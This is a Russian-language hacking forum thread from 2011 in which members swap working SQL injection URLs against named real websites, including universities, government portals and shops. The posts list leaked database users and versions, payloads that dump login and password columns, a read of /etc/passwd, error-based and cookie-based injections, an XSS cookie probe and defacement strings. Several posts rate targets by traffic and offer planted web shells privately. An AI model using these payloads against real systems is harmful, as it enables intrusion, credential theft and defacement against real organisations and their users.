http://www.cvu.dn.ua/download.php?id=63.9'+union+all+select+1,2,3,4,5,6 ,7,8,9,concat_ws(0x3a,user(),version(),database()) ,11,12,13,14,15,16+and+'x'='x
User: h3403_cvu@localhost
Version: 5.1.50
Database: h3403_cvu
PR 3
тИЦ 30
Code:
http://filtr.kharkov.ua/t.php?id=5.9+union+all+select+1,2,3,4,5,6,7,8,9,co ncat_ws(0x3a,user(),version(),database()),11,12,13 ,14,15,16,17+--+
User: uzver@localhost
Version: 5.1.49-3-log
Database: filtr
PR 6
тИЦ 9500
Code:
http://www.autodealer.ua/articles/event.php?id=999999.9' union all select 1,concat(0x7e,0x27,concat_ws(0x3a,user(),version() ,database()),0x27,0x7e),3,4+--+
User: ua_adlr@localhost
Version: 5.1.41-3ubuntu12.9
Database: ua.autodealer
PR 4
тИЦ 190
DezMond™
28.08.2011, 15:23
www.abw.by ТИЦ425 PR5 AR16700
посетителей за 24 часа: 59537
Code:
http://www.abw.by/index.php?act=catalog2&do=tbl&ph=372&n_ph=4&n1_ph=2&pht=4&mark2=Citroen&model23=Xsara&marka_id22=51&model_id23=691&id=-7496+union+select+null,2,3,4,concat_ws(0x3a,userna me,user_password)+from+users+--+
ЗЫ Всего зарегистрированных пользователей: 544143
Code:
http://www.worldcall.net.pk/news.php?id=1+union+Select+1,group_concat%28table_ name%29,3,4,5+from+information_schema.tables+where +table_schema=0x6e65775f706f7274616c5f32303038%20--
version: 5.0.77
database: new_portal_2008
user: root@localhost
+ PR: 4
Code:
http://www.shopestores.com/subcategory.php?id=-1+union+Select+1,2,concat_ws%280x3a,version%28%29, database%28%29,user%28%29%29,4,5,6+--+
version: 5.1.53-log
database: shopestores
user: estores@frontstnet.net
+ PR: 2
http://www.nosmoking.ru/images/NSMLOGO.gif
http://www.nosmoking.ru/newsblock.php?action=showcat&catid=-3%20and%201=2%20union%20select%201,2,3,4,5,concat_ ws(char(58),@@version,user(),database()),7,8+--
5.0.77 nsm_news@localhost nsm_news
http://www.catedrasteimberg.com.ar/novedades/novedad.php?id=-68+union+select+1,2,3,4,5,password,7,8,9,10,11,12+ from+usuarios--
http://www.semioticasteimberg.com.ar/novedades/novedad.php?id=-68+union+select+1,2,3,4,5,password,7,8,9,10,11,12+ from+usuarios--
Code:
http://botox.ru/cosmetic/centers/moscow/?view_metro_id=10+uNIOn+sELECT+1,2,3,version%28%29 ,5,6,7,8,9,10%20--
Всем B07ОХ посоны!
Yandex ТИЦ 100
Google PageRank 3
PHP:
version:5.0.90
database:u154046
user:u154046@10.8.0.15
========пополнение==========
Code:
http://beli.ru/tovar/?id=7795+union+select+1,2,3,version%28%29,user%28% 29,6,database%28%29,8,9,10,11,12,13%20--
есть таблица с айпишниками
Yandex ТИЦ 0 4к паг между прочим
Google PageRank 3
PHP:
version:5.0.90
database:u22946_2
user:u22946@10.8.0.57
Code:
http://vkka.gov.ua/index.php?id=-1+union+select+1,version(),user(),database(),5,6,7 ,8,9,10,11,12,13,14,15,16,17&page=katalog
5.5.14
vkka_root@localhost
vkka_adv
(CY) 60
(PR) 3
Code:
http://webshop.dgn-thai.net/test/page.php?id=-63+union+all+select+1,concat_ws(0x3a,user(),versio n(),database()),3,4,5,6+--+
webdev@203.170.193.22
5.1.39-community
dgn_blog
Code:
http://passion-wow.com/?news=1+UNION+SELECT+1,concat_ws(0x202f20,user(),v ersion(),database()),3,4,5,6,7+FROM+INFORMATION_SC HEMA.TABLES+--+
5.0.24a-community-nt
root1@127.0.0.1
wownews
HAXTA4OK : "Не плоди посты, если ты последний ответил, то просто редактируй пост и вставляй сюда же"
winstrool
01.09.2011, 01:50
ТИЦ 140 ПР 3
http://www.restcon.ru/index.php/docs1/images/video/images/index.php?section=article&article_id='642'+AND+(version()+like+'%4.0.26%')+a nd+(user()+like+'%restconcaravanru%')+and+(databas e()+like+'%restconcaravanru%')+--+
случайно нашел:
Code:
http://www.buildcommerce-bg.com/index.php ?option=com_astra&S=4&F=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,3 2,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48, 49,50,51,52,53,54,55,56,57,58,59 /*
DezMond™
02.09.2011, 17:53
PR8 ТИЦ300
http://www.uni-potsdam.de/statoek/literatur_abfrage.php?eingabe=Details&id=-195+union+select+1,2,3,4,5,6,7,8,LOAD_FILE(0x2F657 4632F706173737764)+--+
Mickey House
02.09.2011, 18:01
Code:
http://www.st-martin.org/reservations/lire/index.php?rubid=9+and+1=0+Union+Select+1,0x4861636 B656420627920494E432E--
Code:
http://www.teledom.fr/sint_maarten/lire/index.php?rubid=6+AND+1=2+UNION+SELECT+0x31,0x4861 636B656420627920494E432E--
Code:
http://www.cinema-tout-ecran.ch/2008/index.php?lan='en&rubID=50+and+1=0+Union+Select+1,2,3,0x4861636B6564 20627920494E432E,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19--
DezMond™
02.09.2011, 22:27
http://www.arisierung-in-thueringen.uni-jena.de/component/option,com_ownbiblio/Itemid,83/view,ownbiblio/index.php?option=com_ownbiblio&Itemid=83&view=delete&id=168&catid=-42+union+select+1,2,user(),4,5,6,7,8,9,10,11,12,13 ,14,15,16+--+
ТИЦ500 PR7
http://www.uni-hannover.de/de/aktuell/online-aktuell/index.php?funktion=archiv&monat=4&jahr=2008&rubrik=-2+union+select+user()+--+
uhimp@luhw3live.uni-hannover.de
Lam3rsha
03.09.2011, 05:07
http://g-baza.ru/spisok.php?lr=561001&hr=3000+union+select+version()
Database Version: 5.0.77-log
Database name: fbaza-1_refer
User name: fbaza-1_refer@91.219.194.13
http://planeta.tspu.ru/?ur=810&ur1=870&ur2=1215+UNION+SELECT+1,2,user(),4,5,6,7,8,9,10,11 ,12,13,14,15--
Version: 5.1.56-log
name: planeta
name: planeta@localhost
http://www.ssa-rss.ru/index.php?page_id=19&id=545+union+select+1,2,3,version(),5,6,7,8
Version: 6.0.7-alpha
name: ssa-rss
name: root@localhost
DezMond™
03.09.2011, 17:10
ТИЦ700 PR9
http://www.univie.ac.at/ANA/php/index3.php?n=-176+union+select+1,2,3,4,5,6,7,'/etc/passwd',9,10,11,12,13,14,15,16,17+--+
pr2
http://www.painton.co.il/page_e.php?id=-107+union+select+1,2,3,4,group_concat(name,0x3a,pa ssward),6,7,8,9,10,11+from+users--
pr2
http://opr.co.il/page_e.php?id=-119+union+select+1,2,3,4,group_concat(name,0x3a,pa ssward),6,7+from+users--
http://net.cncnc.edu.cn/page_r.php?id=-99+union+select+1,2,3,4,5,6,7,8,9,10,11+from+admin--
pr1
http://www.jugendfeuerwehr-kreis-ravensburg.de/page_r.php?id=-4+union+select+1,2,group_concat(name,0x3a,pass),4+ from+zugriff--
admin:
main_r.php?id=10&expand_id=10
http://architect.tbilisi.gov.ge/psite/page_c.php?id=-287+union+select+1,2,3,version()--
Fédération Française de Basketball
http://www.ffbb.com/_minibasket/page_a.php?d=actu&p=actu&id=3442"/>alert(document.cookie)
http://www.ffbb.com/_minibasket/page_a.php?d=actu&p=actu&id=3442+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,version(),23--
http://www.terrasana.net/page_i.php?id=-45+union+select+1,2,pass,4,5,6,7,8,9,10,11,12+from +ts_admin--
http://www.egilplastics.com/enews.php?id=-24+union+select+1,group_concat(password,0x3a,sh),3 ,4,5,6,7,8+from+fk_admin--
http://www.hdpe-butt-welding.com/enews.php?id=-24+union+select+1,group_concat(password,0x3a,sh),3 ,4,5,6,7,8+from+fk_admin--
http://enoveragroup.com/anews.php?id=-9+union+select+group_concat(login,0x3a,password),2 ,3+from+user--
http://www.actupix.net/tnews.php?op=tnews&id=-174+union+select+1,2,3,4,5,group_concat(login,0x3a ,pass),7,8,9,10,11,12+from+users--
http://www.burelfc.com/tnews.php?op=tnews&id=-174+union+select+1,2,3,4,5,group_concat(login,0x3a ,pass),7,8,9,10,11,12+from+users--
Давненько жирного не было =)
Peoples.Ru
тИЦ 4600
Pr 3
Посещалка ~70-80k
Из них РУ траф 50k
HTML:
http://music.peoples[xD].ru/search/?name=1%27and%281%3D0%29union%28select%281%29%2Cco ncat_[system]ws%280x3a%2Cversion%28%29%2Cdatabase%28%29%2Cuser% 28%29%2C%40%40version_compile_os%29%2C3%2C4%2C5%2C 6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2 C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2 C27%2C28%2C29%2C30%2C31%2C32%2C33%2C34%2C35%2C36%2 C37%2C38%2C39%2C40%2C41%2C42%2C43%2C44%2C45%2C46%2 C47%2C48%2C49%2C50%2C51%2C52%2C53%2C54%2C55%2C56%2 C57%2C58%29%23
P.S. На других поддоменах тоже много SQL-inj. Поэтому можете их не постить Если шелл зальете, то обязательно отпишитесь в ПМ... Хорошо эксплуатируете SQL-inj, то тоже в ПМ, есть идейки)
http://vvo.aero/index.php?a=in&views=_eng&date_z=&point=&Itemid=&list=-140+UNION+ALL+SELECT+from+information_schema.table s+whe%20%20re+table_schema=0x68656c6c6f776f725f686 56c6c6f+--
вроде как джумла... но охреневшая!!!
MyGreenLife
09.09.2011, 23:26
http://www.sibyacht.ru/html/index.php?gid=-10+union+select+1,concat(adminlogin,0x3a,adminpass word),3,4,5,6,7+from+admins--+
Инфа в тайтле.
тиц 2000. пр 5.
http://www.passion.ru/piknik.php/view/(2)union(select(1),version(),3)
5.5.13-log
тиц 850. пр 5.
http://www.kant.ru/show_good1.php?t=alpine_boots+where+1=2+union+sele ct+version%28%29,2,3,4,5,6,7,8,9,0,1,2,1,4,5,6,7,8 ,9,0,1,2,3,4,5,6,7--+
5.1.58
Code:
http://www.ktsk.ru/index.php?id=-1+union+select+1,group_concat%28table_name+separat or+0x3a%29,3,4,5,6,7,8+from+information_schema.tab les+where+table_schema=0x7765626d6f72746f6e5f6b747 36b --
Code:
http://www.horncastlecivic.org.uk/worthies/details.php?id=-1+union+select+1,group_concat%28username,0x3a,pass word%29,3,4,5,6+from+admin%20--
Code:
http://www.yhmag.co.uk/comp_dets.php?id=1+union+select+1,2,group_concat%2 8name,0x3a,password%29,4,5,6,7,8,9,10,11,12+from+L UM_User%20--
Code:
http://www.whoisintown.co.uk/town_stories.php?id=-1+union+select+1,2,3,4,5,group_concat%28username,0 x3a,password%29,7,8,9,10+from+members%20--
Code:
http://www.jimmyeatworldlive.co.uk/demodetails.php?id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11 +--+
тиц 1.5к, пр5. 8к-20к+ траф
Code:
url:http://www.stroyportal.ru/
document.cookie="cookie_reg=-101 union+select+version()--"
location.reload();
5.5.7-rc-log
phpAdsNew
safe mode: ON Т____Т
кому надо(д кому надо то...) шелл - в приват.
-------------
тиц 90, пр4, 6к+ траф.
Code:
www.play-today.ru/index.php?productID=39119+and+(select 1 from(select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a)--+
5.1.561
WBS_USER
upd:
(шелл отдан)
Code:
http://24rus.ru/more.php?UID=73389+or+1+group+by+concat%28version% 28%29,floor%28rand%280%29*2%29%29having+min%280%29 +or+1--+
2к ТИЦ, всем фапать посоны! 191к паг в яше
5 PR
sourcec0de
12.09.2011, 19:27
getdota.com
Code:
http://www.getdota.com/app/getmap/
POST:
mirror_id=0&mirror_nr=2&file_name=DotA+v6.72f.w3x&as_zip=0&language=en&map_id=501&language_id=2 and(select min(@:=1)from (select 1 union select 2)k group by concat((select concat_ws(0x3a,user_id,login,pass)from users limit 0,1),@:=@-1))
Code:
http://www.tdgalion.ru/keramogranit.php?sizecol=72+union+select+table_nam e,2,3,4,5,6,7,8+from+information_schema.tables+lim it+0,1--+
user:u259236@10.8.1.61
database:u259236_2
version:5.0.90-log
1100 ТИЦ
5 PR
Code:
http://www.bmsk.ru/news.php?id=-653+union+select+1,2,3,4,group_concat%28version%28 %29,0x3a,user%28%29,0x3a,database%28%29%29,6,7,8,9 ,10,11--
вывод в исходнике
Code:
http://wmhistory.com/passport.php?id=-11638+union+select+1,version(),3,4,5,6--
Version: 5.0.51a-24+lenny5
http://www.naturaleshop.gr/prod.php?id=1+union+select+null,group_concat(usern ame,0x3a,password),3,4,5,6,7,8,9,10,11+from+Accoun ts--
http://petguide.gr/prod.php?id=-412+union+select+null,group_concat(username,0x3a,p assword),3,4,5,6,7,8,9,10,11,13,13,14,15+from+Acco unts--
http://www.petshopmarket.gr/prod.php?id=1+union+select+null,group_concat(usern ame,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15 +from+Accounts--
http://torrent.hacker.lv/download.php?id=8617&name=Gorod.vorov.2010.D.HDRip.torrent
нашёл Boobby (Taimas)
прочитать домен
t3cHn0iD
14.09.2011, 12:22
http://www.seasideheightstourism.com/single_event.php?id=84+and+1=0+union+select+1,conc at_ws(0x3a,username,password),3,4+from+member_logi n--
http://sms.dovrecka.sk/sms.php?id=3964+and+1=0+union+select+1,2,3,concat_ ws(0x3a,version(),user()),5,6,7,8,9--
OxoTnik said:
нашёл Boobby (Taimas)
прочитать домен
Не оффтопь
http://slv.ufanet.ru/component/ufanetdvbclist/?task=package&package=76&pid=0&cid=30
t3cHn0iD said:
Не оффтопь
не тупи
1к трафа
Code:
http://baraholka43.ru/page.php?page=125+union+select+1,version()--+
5.0.51a-24+lenny2+spu1-log
______________
4к+ траф, пр5, тиц450.
Code:
http://www.gmsn.ru/page.php?rub=news&id=-254'+union+select+1,2,(select unhex(hex(version()))),4,5,6,7,8--+
4.1.16-1.gms
______________
траф 1к+, тиц200, п4.
Code:
http://www.mozhaysk.ru/index.php?tp=-bndom%27+union+all+select+1,2,version(),4--+
вывод в коде.
5.1.50-log
t3cHn0iD
16.09.2011, 07:30
OxoTnik said:
http://slv.ufanet.ru/component/ufanetdvbclist/?task=package&package=76&pid=0&cid=30
не тупи
Это у тебя вообще раскрытие пути >_
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot